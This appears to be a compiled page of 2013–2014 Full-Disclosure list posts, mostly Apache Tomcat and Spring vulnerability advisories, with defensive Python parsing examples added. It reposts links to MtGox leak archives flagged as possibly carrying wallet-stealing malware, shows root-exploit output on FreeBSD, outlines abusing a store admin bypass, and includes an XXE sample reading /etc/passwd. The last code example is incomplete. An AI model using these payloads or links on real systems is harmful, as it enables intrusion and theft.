Re: [Full-disclosure] OT What is happening with bitcoins?

2014-03-13 Thread Mark M. Jaycox (EFF)
Be careful about those zip files. I haven't looked, but they may contain
the tibannebackoffice.exe wallet-stealing malware. It has appeared in
other MtGox2014Leak.zip files.

http://www.reddit.com/r/Bitcoin/comments/200k30/the_tibannebackofficeexe_executable_is_wallet/



Mark M. Jaycox | 415.436.9333x128
Electronic Frontier Foundation | Become a Member! eff.org/r.a9hS

On 3/10/14 12:54 AM, coderman wrote:
 On Thu, Mar 6, 2014 at 4:09 PM, Pedro Worcel pe...@worcel.com wrote:
 Bitcoins are doing great actually. =)

 Used to be worth 0 a few years back, useless, and now you can use them to
 buy some stuff.

 also providing some awesome information for future uses, c.f.:


 http://blog.magicaltux.net/wp-content/uploads/2014/03/MtGox2014Leak.zip
 http://89.248.171.30/MtGox2014Leak.zip
 https://mega.co.nz/#!0VliDQBA!4Ontdi2MsLD4J5dV1-sr7pAgEYTSMi8rNeEMBikEhAs
 http://burnbit.com/download/280433/MtGox2014Leak_zip


 let me know if you're still short a mirror...



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [SECURITY] CVE-2014-0033 Session fixation still possible with disableURLRewriting enabled

2014-02-25 Thread Mark Thomas

CVE-2014-0033 Session fixation still possible with disableURLRewriting
enabled

Severity: Low

Vendor: The Apache Software Foundation

Versions Affected:
- Apache Tomcat 6.0.33 to 6.0.37

Description:
Previous fixes to path parameter handling [1] introduced a regression
that meant session IDs provided in the URL were considered even when
disableURLRewriting was configured to true. Note that the session is
only used for that single request.

Mitigation:
Users of affected versions should apply one of the following mitigations
- Upgrade to Apache Tomcat 6.0.39 or later
  (6.0.38 contains the fix but was not released)

Credit:
This issue was identified by the Apache Tomcat security team.

References:
[1] http://svn.apache.org/viewvc?view=revision&revision=r1149220
[2] http://tomcat.apache.org/security-6.html

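The check at the centre of this advisory, as an added example in Python written for this page (Tomcat itself is Java, and none of this is Tomcat's code): a request may present a session id in a cookie or, when URL rewriting is enabled, as a `;jsessionid=` path parameter, and the disableURLRewriting policy has to be enforced at the point where the id is chosen, not only when URLs are generated. The header and URI inputs are constructed and the function names are my own.

```python
import re
from typing import Optional, Tuple

SESSION_COOKIE = "JSESSIONID"
URL_PARAM = "jsessionid"   # Tomcat's path-parameter name for URL rewriting (;jsessionid=...)


def session_id_from_cookie(headers: dict) -> Optional[str]:
    """Return the session id carried in the Cookie header, if any."""
    for part in headers.get("Cookie", "").split(";"):
        name, sep, value = part.strip().partition("=")
        if sep and name == SESSION_COOKIE and value:
            return value
    return None


def session_id_from_url(request_uri: str) -> Optional[str]:
    """Return the session id carried as a path parameter, e.g. /app/page;jsessionid=ABC?x=1.
    Only the path is inspected; the query string is never a session id source."""
    path = request_uri.split("?", 1)[0]
    match = re.search(r";" + URL_PARAM + r"=([^;/?]+)", path, re.IGNORECASE)
    return match.group(1) if match else None


def resolve_session_id(headers: dict, request_uri: str,
                       disable_url_rewriting: bool) -> Tuple[Optional[str], Optional[str]]:
    """Return (session_id, source) or (None, None).

    A cookie always wins. A URL id is consulted only when URL rewriting is
    enabled; with disable_url_rewriting set it is ignored outright, which is
    exactly the rule the regression in the advisory broke for a single request.
    """
    sid = session_id_from_cookie(headers)
    if sid:
        return sid, "cookie"
    if disable_url_rewriting:
        return None, None
    sid = session_id_from_url(request_uri)
    return (sid, "url") if sid else (None, None)


if __name__ == "__main__":
    # Constructed request: no cookie, id only in the URL.
    for flag in (True, False):
        print(f"disableURLRewriting={flag}: "
              f"{resolve_session_id({}, '/app/page;jsessionid=ABC123?x=1', flag)}")
```

A caller that accepts the tuple should additionally verify that the id names an existing, unexpired session before attaching any state to it; a client-supplied id that the server has never issued is the classic session-fixation vector, whichever channel it arrived on.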


[Full-disclosure] [SECURITY] CVE-2013-4322 Incomplete fix for CVE-2012-3544 (Denial of Service)

2014-02-25 Thread Mark Thomas

CVE-2013-4322 Incomplete fix for CVE-2012-3544 (Denial of Service)

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
- Apache Tomcat 8.0.0-RC1 to 8.0.0-RC5
- Apache Tomcat 7.0.0 to 7.0.47
- Apache Tomcat 6.0.0 to 6.0.37

Description:
The fix for CVE-2012-3544 was not complete. It did not cover the
following cases:
a) Chunk extensions were not limited
b) Whitespace after the : in a trailing header was not limited

Mitigation:
Users of affected versions should apply one of the following mitigations
- Upgrade to Apache Tomcat 8.0.0-RC10 or later
  (8.0.0-RC6 to 8.0.0-RC9 contain the fix but were not released)
- Upgrade to Apache Tomcat 7.0.50 or later
  (7.0.48 to 7.0.49 contain the fix but were not released)
- Upgrade to Apache Tomcat 6.0.39 or later
  (6.0.38 contains the fix but was not released)

Credit:
This issue was partly identified by the Apache Tomcat security team and
partly by Saran Neti of TELUS Security Labs.

References:
[1] http://tomcat.apache.org/security-8.html
[2] http://tomcat.apache.org/security-7.html
[3] http://tomcat.apache.org/security-6.html



[Full-disclosure] [SECURITY] CVE-2013-4286 Incomplete fix for CVE-2005-2090 (Information disclosure)

2014-02-25 Thread Mark Thomas

CVE-2013-4286 Incomplete fix for CVE-2005-2090 (Information disclosure)

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
- Apache Tomcat 8.0.0-RC1
- Apache Tomcat 7.0.0 to 7.0.42
- Apache Tomcat 6.0.0 to 6.0.37

Description:
The fix for CVE-2005-2090 was not complete. It did not cover the
following cases:
- content-length header with chunked encoding over any HTTP connector
- multiple content-length headers over any AJP connector

Requests with multiple content-length headers or with a content-length
header when chunked encoding is being used should be rejected as
invalid. When multiple components (firewalls, caches, proxies and
Tomcat) process a sequence of requests where one or more requests
contain either multiple content-length headers or a content-length
header when chunked encoding is being used, and several components do
not reject the request and make different decisions as to which
content-length header to use, an attacker can poison a web cache,
perform an XSS attack and obtain sensitive information from requests
other than their own. Tomcat now rejects requests with multiple
content-length headers or with a content-length header when chunked
encoding is being used.

Mitigation:
Users of affected versions should apply one of the following mitigations
- Upgrade to Apache Tomcat 8.0.0-RC3 or later
  (8.0.0-RC2 contains the fix but was not released)
- Upgrade to Apache Tomcat 7.0.47 or later
  (7.0.43 to 7.0.46 contain the fix but were not released)
- Upgrade to Apache Tomcat 6.0.39 or later
  (6.0.38 contains the fix but was not released)

Credit:
This issue was identified by the Apache Tomcat security team while
investigating an invalid report related to CVE-2005-2090.

References:
[1] http://tomcat.apache.org/security-8.html
[2] http://tomcat.apache.org/security-7.html
[3] http://tomcat.apache.org/security-6.html

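The ambiguity this advisory describes comes down to one check at the edge: a request carrying more than one Content-Length value, or Content-Length together with Transfer-Encoding: chunked, has no single agreed body length, so every component in the chain should reject it rather than pick one. The Python below is an added example written for this page, not Tomcat's code; the request samples are constructed and the function names are my own.

```python
import re


class AmbiguousFraming(ValueError):
    """Raised when a request's body length cannot be determined unambiguously."""


def parse_request_head(raw: bytes):
    """Split a raw HTTP/1.1 request head into (request_line, [(name, value), ...]).
    Header names are lower-cased; values are stripped but otherwise untouched."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        # no colon, empty name, or whitespace around the name: not a header we trust
        if not sep or not name or name != name.strip():
            raise AmbiguousFraming(f"malformed header line: {line!r}")
        headers.append((name.lower(), value.strip()))
    return lines[0], headers


def body_framing(headers) -> str:
    """Return how the body is delimited: 'content-length', 'chunked' or 'none'.
    Any combination that lets two parsers disagree about the body length is rejected."""
    lengths = []
    for name, value in headers:
        if name == "content-length":
            # a comma-separated list inside one header counts as several headers
            lengths.extend(v.strip() for v in value.split(","))
    chunked = any(
        "chunked" in value.lower()
        for name, value in headers
        if name == "transfer-encoding"
    )
    if lengths and chunked:
        raise AmbiguousFraming("Content-Length together with chunked transfer encoding")
    if len(lengths) > 1:
        # identical duplicates are rejected too; being strict here is cheap
        raise AmbiguousFraming(f"multiple Content-Length values: {lengths}")
    if lengths:
        if not re.fullmatch(r"[0-9]+", lengths[0]):
            raise AmbiguousFraming(f"non-numeric Content-Length: {lengths[0]!r}")
        return "content-length"
    return "chunked" if chunked else "none"


def classify(raw: bytes) -> str:
    """Framing mode for a raw request, or 'reject: <reason>' if it is ambiguous."""
    try:
        _, headers = parse_request_head(raw)
        return body_framing(headers)
    except AmbiguousFraming as exc:
        return f"reject: {exc}"


# Constructed sample requests (not captured traffic).
SAMPLES = {
    "clean": b"POST /api HTTP/1.1\r\nHost: app\r\nContent-Length: 5\r\n\r\nhello",
    "double_cl": b"POST /api HTTP/1.1\r\nHost: app\r\nContent-Length: 5\r\n"
                 b"Content-Length: 40\r\n\r\nhello",
    "cl_and_te": b"POST /api HTTP/1.1\r\nHost: app\r\nContent-Length: 5\r\n"
                 b"Transfer-Encoding: chunked\r\n\r\n0\r\n\r\n",
    "chunked": b"POST /api HTTP/1.1\r\nHost: app\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\n",
}

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(f"{label:10s} -> {classify(raw)}")
```

The same function is useful on the detection side: running it over a proxy's access log of raw request heads flags exactly the requests whose framing a downstream component might have interpreted differently.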


[Full-disclosure] [SECURITY] CVE-2013-4590 Information disclosure via XXE when running untrusted web applications

2014-02-25 Thread Mark Thomas

CVE-2013-4590 Information disclosure via XXE when running untrusted web
applications

Severity: Low

Vendor: The Apache Software Foundation

Versions Affected:
- Apache Tomcat 8.0.0-RC1 to 8.0.0-RC5
- Apache Tomcat 7.0.0 to 7.0.47
- Apache Tomcat 6.0.0 to 6.0.37

Description:
Application provided XML files such as web.xml, context.xml, *.tld,
*.tagx and *.jspx allowed XXE which could be used to expose Tomcat
internals to an attacker. This vulnerability only occurs when Tomcat is
running web applications from untrusted sources such as in a shared
hosting environment.

Mitigation:
Users of affected versions should apply one of the following mitigations
- Upgrade to Apache Tomcat 8.0.0-RC10 or later
  (8.0.0-RC6 to 8.0.0-RC9 contain the fix but were not released)
- Upgrade to Apache Tomcat 7.0.50 or later
  (7.0.48 to 7.0.49 contain the fix but were not released)
- Upgrade to Apache Tomcat 6.0.39 or later
  (6.0.38 contains the fix but was not released)

Credit:
This issue was identified by the Apache Tomcat security team.

References:
[1] http://tomcat.apache.org/security-8.html
[2] http://tomcat.apache.org/security-7.html
[3] http://tomcat.apache.org/security-6.html



[Full-disclosure] Google XXE Vulnerability

2014-02-21 Thread Mark Litchfield

Hi All,

There was an XML external entity vulnerability within Google's Public 
data explorer.  This was submitted to Google as part of their Bug Bounty 
Program.


For the full write up with screen shots - 
http://www.securatary.com/vulnerabilities


--
All the best

Mark Litchfield
http://www.securatary.com
Twitter - http://twitter.com/securatary




[Full-disclosure] Shopify (Bug Bounty) - XML External Entity Vulnerability

2014-02-17 Thread Mark Litchfield
Shopify suffered from an XXE attack within their online stores domain - 
*.myshopify.com


They were extremely quick in confirming and fixing the issue (even 
though it was a Sunday).


Full details with the usual screen shots can be found at 
http://www.securatary.com


--
All the best

Mark Litchfield
http://www.securatary.com
Twitter - http://twitter.com/securatary




[Full-disclosure] Ebay, Inc Bug Bounty - GoStoreGo Administrative Authentication Bypass to all online stores

2014-02-12 Thread Mark Litchfield


This attack allowed for a cross store (so essentially unauthenticated, 
as we have not authenticated to our target store) privilege escalation 
attack creating an administrative user on any *.gostorego.com store.


As indicated by their own website, there are over 200,000 active 
stores.  This attack allows access to 200,000 x Customers x data = Y.  
Due to the nature of the attack, it would be trivial to automate an attack 
that would give us an administrative account on each of these stores 
with a single GET request !!  Or you could simply have a great shopping 
experience.  Google search site:gostorego.com, find the items you want 
to purchase.  Create your admin account (or use stealth mode so all 
attacks are logged as the Store Owner), change the price then buy it or 
simply give yourself some store credit.


This vulnerability was reported to the eBay Enterprise Bug Bounty team 
on Sunday 9th February 2014.


They and the Magento engineering team put out a fix for this issue 
extremely quickly.  So pats on the back all around are deserved.  I 
tested the issue and tried a few workarounds, but the fix holds good.  
So I want to say a big thanks to them.


Full issue with screen shots can be found at http://www.securatary.com 
within the vulnerabilities section.


All the best

Mark Litchfield
www.securatary.com







[Full-disclosure] [SECURITY] CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat DoS

2014-02-06 Thread Mark Thomas

CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat DoS

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
- Commons FileUpload 1.0 to 1.3
- Apache Tomcat 8.0.0-RC1 to 8.0.1
- Apache Tomcat 7.0.0 to 7.0.50
- Apache Tomcat 6 and earlier are not affected

Apache Tomcat 7 and Apache Tomcat 8 use a package-renamed copy of
Apache Commons FileUpload to implement the requirement of the Servlet
3.0 and later specifications to support the processing of
mime-multipart requests. Tomcat 7 and 8 are therefore affected by this
issue. While Tomcat 6 uses Commons FileUpload as part of the Manager
application, access to that functionality is limited to authenticated
administrators.

Description:
It is possible to craft a malformed Content-Type header for a
multipart request that causes Apache Commons FileUpload to enter an
infinite loop. A malicious user could, therefore, craft a malformed
request that triggered a denial of service.
This issue was reported responsibly to the Apache Software Foundation
via JPCERT, but an error in addressing an e-mail led to the unintended
early disclosure of this issue [1].

Mitigation:
Users of affected versions should apply one of the following mitigations
- Upgrade to Apache Commons FileUpload 1.3.1 or later once released
- Upgrade to Apache Tomcat 8.0.2 or later once released
- Upgrade to Apache Tomcat 7.0.51 or later once released
- Apply the appropriate patch
  - Commons FileUpload: http://svn.apache.org/r1565143
  - Tomcat 8: http://svn.apache.org/r1565163
  - Tomcat 7: http://svn.apache.org/r1565169
- Limit the size of the Content-Type header to less than 4091 bytes

Credit:
This issue was reported to the Apache Software Foundation via JPCERT.

References:
[1] http://markmail.org/message/kpfl7ax4el2owb3o
[2] http://tomcat.apache.org/security-8.html
[3] http://tomcat.apache.org/security-7.html

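The last item in the mitigation list, capping the Content-Type header length, is a stopgap for a parser that could loop forever on a malformed boundary. The Python below is an added example written for this page, not Commons FileUpload's code: it validates the header before any body processing starts (length cap at the advisory's 4091 bytes, boundary syntax and length per RFC 2046) and splits the body with a scan position that strictly advances, so termination does not depend on the boundary being well-formed. The sample request is constructed and the names are my own.

```python
import re


class MultipartError(ValueError):
    """Raised for a Content-Type or body that this parser refuses to process."""


# The advisory's interim workaround: reject a Content-Type of 4091 bytes or more.
MAX_CONTENT_TYPE_BYTES = 4091
# RFC 2046 boundary syntax: 1 to 70 characters from this set, not ending in a space.
_BOUNDARY_RE = re.compile(rb"^[0-9A-Za-z'()+_,\-./:=? ]{1,70}$")


def multipart_boundary(content_type: bytes) -> bytes:
    """Validate a multipart/form-data Content-Type header and return its boundary."""
    if len(content_type) >= MAX_CONTENT_TYPE_BYTES:
        raise MultipartError("Content-Type header too long")
    media_type, *params = (p.strip() for p in content_type.split(b";"))
    if media_type.lower() != b"multipart/form-data":
        raise MultipartError(f"not multipart/form-data: {media_type!r}")
    boundary = None
    for param in params:
        name, sep, value = param.partition(b"=")
        if sep and name.strip().lower() == b"boundary":
            value = value.strip()
            if len(value) >= 2 and value[:1] == b'"' and value[-1:] == b'"':
                value = value[1:-1]          # quoted-string form
            boundary = value
    if boundary is None:
        raise MultipartError("missing boundary parameter")
    if not _BOUNDARY_RE.match(boundary) or boundary.endswith(b" "):
        raise MultipartError(f"boundary violates RFC 2046 syntax or length: {boundary!r}")
    return boundary


def is_valid_content_type(content_type: bytes) -> bool:
    try:
        multipart_boundary(content_type)
        return True
    except MultipartError:
        return False


def split_multipart(body: bytes, boundary: bytes):
    """Split a body into [(raw_part_headers, data), ...].

    The scan position moves forward by at least len(delimiter) + 2 per part and
    never moves back, so the loop terminates for every input, including truncated
    bodies and bodies that never contain the delimiter at all."""
    delimiter = b"--" + boundary
    pos = body.find(delimiter)
    if pos < 0:
        raise MultipartError("opening delimiter not found")
    pos += len(delimiter)
    parts = []
    while True:
        if body[pos:pos + 2] == b"--":
            return parts                      # closing delimiter "--boundary--"
        if body[pos:pos + 2] != b"\r\n":
            raise MultipartError("delimiter not followed by CRLF or '--'")
        pos += 2
        nxt = body.find(b"\r\n" + delimiter, pos)
        if nxt < 0:
            raise MultipartError("unterminated part")
        head, sep, data = body[pos:nxt].partition(b"\r\n\r\n")
        if not sep:
            raise MultipartError("part without header/body separator")
        parts.append((head, data))
        pos = nxt + 2 + len(delimiter)


def parse_upload(content_type: bytes, body: bytes):
    """Validate the header first, then split the body."""
    return split_multipart(body, multipart_boundary(content_type))


# Constructed sample request (not captured traffic).
SAMPLE_CT = b"multipart/form-data; boundary=frontier"
SAMPLE_BODY = (
    b"--frontier\r\n"
    b'Content-Disposition: form-data; name="note"\r\n\r\n'
    b"hello\r\n"
    b"--frontier\r\n"
    b'Content-Disposition: form-data; name="file"; filename="x.txt"\r\n'
    b"Content-Type: text/plain\r\n\r\n"
    b"world\r\n"
    b"--frontier--\r\n"
)
```

Rejecting an over-long header before the body is read is also the cheapest place to log the event: a Content-Type of several kilobytes is not something a browser or a normal client library produces.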


Re: [Full-disclosure] Ektron CMS TakeOver Part (2) - PaylPal-Forward.com demonstration

2014-02-05 Thread Mark Litchfield

On 2/4/2014 2:51 PM, security curmudgeon wrote:


: From: Mark Litchfield mark () securatary com
:
: As previously stated, I would post an update for Ektron CMS bypassing
: the security fix.
:
: A full step by step with the usual screen shots can be found at -
: http://www.securatary.com/vulnerabilities


Uh... you expect people to login to your site with their Facebook or 
Twitter credentials, to access these advisories?


Errr no ??  Use the other option ??  And if you don't want to register, 
don't bother !!




Re: [Full-disclosure] Ektron CMS TakeOver Part (2) - PaylPal-Forward.com demonstration

2014-02-05 Thread Mark Litchfield

On 2/4/2014 3:01 PM, security curmudgeon wrote:

:  : From: Mark Litchfield mark () securatary com
:  :
:  : As previously stated, I would post an update for Ektron CMS bypassing
:  : the security fix.
:  :
:  : A full step by step with the usual screen shots can be found at -
:  : http://www.securatary.com/vulnerabilities
:
:  Uh... you expect people to login to your site with their Facebook or Twitter
:  credentials, to access these advisories?
:
: Errr no ??  Use the other option ??  And if you don't want to register, don't
: bother !!

Links from /vulnerabilities, directly from advisories off the Research
page, and even Follow us on Twitter all drop back to a login page asking
for authentication using either Facebook or Twitter.

This is not the behavior of the site as of 48 hours ago.
Let me check.  Normal registration should also be available ? In fact I 
will remove the registration.


The purpose of this whole registration in the first place was to allow 
for future postings I am going to make later this week that would only 
be available to registered users.  Not necessarily vulnerabilities, but 
useful stuff for pentesting.  Also all registered users would be given 
a 48-hour head start on any new vulnerabilities that I post in the future.


All the best

Mark



Re: [Full-disclosure] [SPAM] Re: Ektron CMS TakeOver Part (2) - PaylPal-Forward.com demonstration

2014-02-05 Thread Mark Litchfield

On 2/4/2014 3:13 PM, security curmudgeon wrote:

:  This is not the behavior of the site as of 48 hours ago.

: Let me check.  Normal registration should also be available ? Infact I
: will remove the registration.
:
: The purpose of this whole registration in the first place was to allow
: for future postings I am going to make later this week that would only
: be available to registered users.  Not necessarily vulnerabilities, but
: useful stuff for pentesting.  Also all registered users would be given
: a 48 hours head start on any new vulnerabilities that I post in the
: future.

Which is great, but I strongly recommend you allow a site-specific
registration for such purposes. Giving up one of the two dominant social
media accounts for it is excessive.
Whilst you may be correct, Securatary is working toward the reason why 
it exists in the first place - Crowd Sourcing - 
http://www.securatary.com/PPPs/Pentester-Info.  With this in mind, 
making user registration an easy, no-hassle process was the reason to 
include these social login features as an OPTION.  Since March last 
year I have been trying to get investment to get it up and running but 
no such luck as of yet.


Anyway, that is the reason for these login options.  Using these is at 
the user's discretion so I see no need to pull them down and, to be 
honest, it's my website; I would not dream of telling you (strongly 
recommend) what to do with yours.


Thanks

Mark



Re: [Full-disclosure] [SPAM] Re: Ektron CMS TakeOver Part (2) - PaylPal-Forward.com demonstration

2014-02-05 Thread Mark Litchfield

On 2/4/2014 3:13 PM, security curmudgeon wrote:

:  This is not the behavior of the site as of 48 hours ago.

: Let me check.  Normal registration should also be available ? Infact I
: will remove the registration.
:
: The purpose of this whole registration in the first place was to allow
: for future postings I am going to make later this week that would only
: be available to registered users.  Not necessarily vulnerabilities, but
: useful stuff for pentesting.  Also all registered users would be given
: a 48 hours head start on any new vulnerabilities that I post in the
: future.

Which is great, but I strongly recommend you allow a site-specific
registration for such purposes. Giving up one of the two dominant social
media accounts for it is excessive.
I should add, I am all for constructive criticism.  But a public forum 
is not really the place.  Feel free to email me directly.


Thanks



[Full-disclosure] Ektron CMS TakeOver Part (2) - PaylPal-Forward.com demonstration

2014-02-04 Thread Mark Litchfield
As previously stated, I would post an update for Ektron CMS bypassing 
the security fix.


A full step by step with the usual screen shots can be found at - 
http://www.securatary.com/vulnerabilities


In this example, we use www.paypal-forward.com as a demonstration site.  
I would like to say that PayPal fixed this issue with their own 
workaround extremely quickly.  Excellent work by their security / dev team.


All the best

Mark Litchfield
www.securatary.com




Re: [Full-disclosure] XXE Injection in Spring Framework

2013-11-05 Thread Mark Thomas
On 04/11/2013 19:26, /-\\ndrew /\//ady wrote:
 Hi,
 Was Pivotal informed about these advisories and was there any
collaboration from them?
 The current stable is 3.2.4

Yes, Pivotal was informed of these issues by Alvaro Munoz of the HP
Enterprise Security Team who discovered them and reported them
responsibly to the Pivotal Security Team.

Yes, there was collaboration between Alvaro Munoz, the Pivotal Security
Team and the Spring developers as we worked through which vectors were
an application responsibility, which were a framework responsibility and
how each was going to be addressed.

I'd have to go back and check my archive in detail to be certain but
from memory the vectors that were an application responsibility already
had a warning in the documentation and that warning was expanded. Some
new utility classes were also provided to make it easier for users to do
the right thing.

For the vectors the framework was responsible for, entity expansion was
disabled by default (it was enabled by default in some cases - hence the
vulnerability). Where an option to control entity expansion didn't
previously exist one was added so that applications that were processing
XML from trusted sources and wanted / needed to enable entity expansion
could do so.

See also:
http://www.gopivotal.com/security/cve-2013-4152
http://seclists.org/fulldisclosure/2013/Aug/233

HTH,

Mark
Pivotal Security Team Lead


 Thanks,
 A.


 On Saturday, November 02, 2013 07:04:59 AM MustLive wrote:
 Hello!

 I'll give you additional information concerning advisory XML External
 Entity (XXE) Injection in Spring Framework
 (http://securityvulns.ru/docs29758.html).

 -
 Affected products:
 -

 - 3.0.0 to 3.2.3 (Spring OXM & Spring MVC)
 - 4.0.0.M1 (Spring OXM)
 - 4.0.0.M1-4.0.0.M2 (Spring MVC)
 - Earlier unsupported versions may also be affected

 -
 Affected vendors:
 -

 Spring by Pivotal.

 --
 Details:
 --

 The Spring OXM wrapper doesn't disable external entity resolution when
 using the JAXB unmarshaller (SAXSource and StreamSource instances are
 vulnerable). Also Spring MVC processes user provided XML with JAXB in
 combination with a StAX XMLInputFactory without disabling external entity
 resolution.

 Besides standard vectors of attack with XXE Injection vulnerabilities
 (such as local file inclusion), which are usually mentioned in
 advisories, XXE Injection also allows conducting attacks on other
 sites. And using DAVOSET (DDoS attacks via other sites execution tool)
 it's possible to automate such attacks.

 I wrote about such attacks in my 2012 article Using XML External
 Entities (XXE) for attacks on other sites
 (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2012-August/008481.html)
 and my 2013 article Using XXE vulnerabilities for attacks on other sites
 (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-August/008887.html).
 As I described in my articles, XXE vulnerabilities can be used for
 conducting CSRF and DoS attacks on other sites (and when using multiple
 web sites it's possible to conduct DDoS attacks). And my tool DAVOSET
 can be used for conducting such attacks via XXE vulnerabilities.

 In October I released a video demonstration of DAVOSET:
 http://www.youtube.com/watch?v=RKi35-f346I

 So all vulnerable web applications with affected versions of Spring
 Framework can be used for attacks on other sites via XXE Injection.

 Best wishes & regards,
 MustLive
 Administrator of Websecurity web site
 http://websecurity.com.ua
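Both the Spring advisory in this thread and CVE-2013-4590 earlier on this page are fixed the same way: a parser handling XML from untrusted sources must not resolve external entities, and the simplest robust policy is to refuse any DOCTYPE, which also rules out internal entity declarations and the expansion blow-ups they enable. The following is an added Python example written for this page, not Spring's or Tomcat's code; it applies that policy with the standard-library expat parser (Python's expat does not fetch external entities on its own, so the gate here is the explicit policy, not a change in fetching behaviour). The XML samples are constructed; the Java equivalent is the disallow-doctype-decl feature on the parser factory.

```python
import xml.parsers.expat as expat


class UnsafeXml(ValueError):
    """Raised when an untrusted document uses a construct this parser refuses."""


def parse_untrusted_xml(data: bytes) -> dict:
    """Parse XML from an untrusted source into a simple element tree.

    Policy: no DOCTYPE at all (so no entity declarations, internal or external,
    hence neither XXE nor entity-expansion DoS), and no external entity
    reference even if one somehow reached the parser.
    """
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        raise UnsafeXml(f"DOCTYPE {name!r} is not accepted from untrusted input")

    def reject_external_entity(context, base, system_id, public_id):
        raise UnsafeXml(f"external entity {system_id!r} is not accepted")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.ExternalEntityRefHandler = reject_external_entity

    root = {"tag": None, "attrs": {}, "text": "", "children": []}
    stack = [root]

    def start(name, attrs):
        element = {"tag": name, "attrs": dict(attrs), "text": "", "children": []}
        stack[-1]["children"].append(element)
        stack.append(element)

    def end(name):
        stack.pop()

    def chars(text):
        stack[-1]["text"] += text

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    parser.Parse(data, True)          # exceptions raised in handlers propagate from here
    return root["children"][0]


def is_accepted(data: bytes) -> bool:
    """True if the document parses under the untrusted-input policy."""
    try:
        parse_untrusted_xml(data)
        return True
    except (UnsafeXml, expat.ExpatError):
        return False


# Constructed samples.
BENIGN = b'<?xml version="1.0"?><order id="7"><item>widget</item></order>'
XXE = (b'<?xml version="1.0"?><!DOCTYPE d [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
       b"<order><item>&xxe;</item></order>")
EXPANSION = (b'<?xml version="1.0"?><!DOCTYPE d [<!ENTITY a "aaaaaaaaaa">'
             b'<!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;">]><d>&b;</d>')

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("xxe", XXE), ("expansion", EXPANSION)):
        print(f"{label:10s} accepted={is_accepted(doc)}")
```

Where an application genuinely needs a DTD for trusted documents, that is a separate code path with its own parser configuration; the point of the advisories is that the default for anything user-supplied should be the refusing one.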

Re: [Full-disclosure] Happy Birthday FreeBSD! Now you are 20 years old and your security is the same as 20 years ago... :)

2013-06-20 Thread Mark Felder

On Wed, 19 Jun 2013 16:32:59 -0500, Hunger hun...@hunger.hu wrote:


$ uname -a
FreeBSD fbsd91x64 9.1-RELEASE FreeBSD 9.1-RELEASE #0 r243825: Tue Dec
4 09:23:10 UTC 2012
r...@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
$ id
uid=1001(hunger) gid=1002(hunger) groups=1002(hunger)
$ gcc fbsd9lul.c -o fbsd9lul
$ ./fbsd9lul
FreeBSD 9.{0,1} mmap/ptrace exploit
by Hunger fbsd9...@hunger.hu
# id
uid=0(root) gid=0(wheel) egid=1002(hunger) groups=1002(hunger)
#


But does your exploit compile with clang?



[Full-disclosure] CVE-2013-2071 Request mix-up if AsyncListener method throws RuntimeException

2013-05-10 Thread Mark Thomas

CVE-2013-2071 Request mix-up if AsyncListener method throws
  RuntimeException

Severity: Moderate

Vendor: The Apache Software Foundation

Versions Affected:
- Tomcat 7.0.0 to 7.0.39

Description:
Bug 54178 described a scenario where elements of a previous request may
be exposed to a current request. This was very difficult to exploit
deliberately but fairly likely to happen unexpectedly if an application
used AsyncListeners that threw RuntimeExceptions. The issue was fixed by
catching the RuntimeExceptions.

Mitigation:
Users of affected versions should apply the following mitigation:
- Tomcat 7.0.x users should upgrade to 7.0.40 or later

Credit:
The security implications of this issue were identified by the Apache
Tomcat Security Team.

References:
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html
https://issues.apache.org/bugzilla/show_bug.cgi?id=54178



[Full-disclosure] [SECURITY] CVE-2013-2067 Session fixation with FORM authenticator

2013-05-10 Thread Mark Thomas

CVE-2013-2067 Session fixation with FORM authenticator

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
- Tomcat 7.0.0 to 7.0.32
- Tomcat 6.0.21 to 6.0.36

Description:
FORM authentication associates the most recent request requiring
authentication with the current session. By repeatedly sending a request
for an authenticated resource while the victim is completing the login
form, an attacker could inject a request that would be executed using
the victim's credentials. This attack has been prevented by changing the
session ID prior to displaying the login page as well as after the user
has successfully authenticated.


Mitigation:
Users of affected versions should apply one of the following mitigations:
- Tomcat 7.0.x users should upgrade to 7.0.33 or later
- Tomcat 6.0.x users should upgrade to 6.0.37 or later

Credit:
This issue was identified by the Apache Tomcat Security Team.

References:
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-6.html

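The race this advisory describes and the two-point fix, as an added example written for this page in Python rather than Tomcat's Java: a FORM authenticator that remembers the request which triggered the login page and replays it after login, with the session id changed before the login page is shown and again after authentication. The session store, the credential map and the request paths are constructed; `simulate` runs the same sequence with and without the pre-login rotation so the difference is visible.

```python
import secrets


class SessionStore:
    """Minimal in-memory session store (constructed for this example)."""

    def __init__(self):
        self._sessions = {}

    def get_or_create(self, sid):
        """Return (sid, data); an unknown or missing id gets a brand-new session."""
        if sid is None or sid not in self._sessions:
            sid = secrets.token_hex(16)
            self._sessions[sid] = {"user": None, "saved_request": None}
        return sid, self._sessions[sid]

    def rotate(self, sid):
        """Move the session data under a fresh id and retire the old one."""
        data = self._sessions.pop(sid)
        new_sid = secrets.token_hex(16)
        self._sessions[new_sid] = data
        return new_sid


class FormAuthenticator:
    """FORM-style authenticator: remembers the request that triggered the login
    page and replays it after a successful login, as the advisory describes."""

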